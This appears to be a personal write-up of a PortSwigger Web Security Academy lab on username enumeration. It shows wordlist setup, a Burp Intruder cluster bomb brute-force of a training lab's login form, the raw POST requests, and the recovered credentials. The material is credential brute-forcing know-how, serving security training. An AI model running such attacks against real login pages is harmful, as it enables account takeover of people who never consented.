Port Swigger Username enumeration via different re
Username enumeration via different responses
Solution
Create a wordlists: users.txt and pass.txt
Copy and paste wordlists from the website:
https://portswigger.net/web-security/authentication/auth-lab-usernames
https://portswigger.net/web-security/authentication/auth-lab-passwords
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Username enumeration via different responses]
└─$ head -n2 *.txt
==> pass.txt <==
123456
password
==> users.txt <==
carlos
root
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Username enumeration via different responses]
└─$
Open the website: https://0acb000d047b2e3e8129c5f600d500da.web-security-academy.net/login
https://0acb000d047b2e3e8129c5f600d500da.web-security-academy.net/login
Brute force login and password - Intruder
Choose "Cluster bom attack"
Load payload position 1 - admin: wordlist users.txt
Load payload position 2 - password: wordlist pass.txt
---
POST /login HTTP/2
Host: 0acb000d047b2e3e8129c5f600d500da.web-security-academy.net
Cookie: session=NBRuCP6IzX2bpS6eYRoirtQg6mdGdC1c
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: https://0acb000d047b2e3e8129c5f600d500da.web-security-academy.net
Referer: https://0acb000d047b2e3e8129c5f600d500da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=admin&password=password
Bruteforce results - Instruder
Found correct user and password.
U: akamai
P: 666666
---
POST /login HTTP/2
Host: 0acb000d047b2e3e8129c5f600d500da.web-security-academy.net
Cookie: session=NBRuCP6IzX2bpS6eYRoirtQg6mdGdC1c
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://0acb000d047b2e3e8129c5f600d500da.web-security-academy.net
Referer: https://0acb000d047b2e3e8129c5f600d500da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
username=akamai&password=666666
Login to website as user: akamai
POST /login HTTP/2
Host: 0acb000d047b2e3e8129c5f600d500da.web-security-academy.net
Cookie: session=NBRuCP6IzX2bpS6eYRoirtQg6mdGdC1c
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://0acb000d047b2e3e8129c5f600d500da.web-security-academy.net
Referer: https://0acb000d047b2e3e8129c5f600d500da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=akamai&password=666666
Solved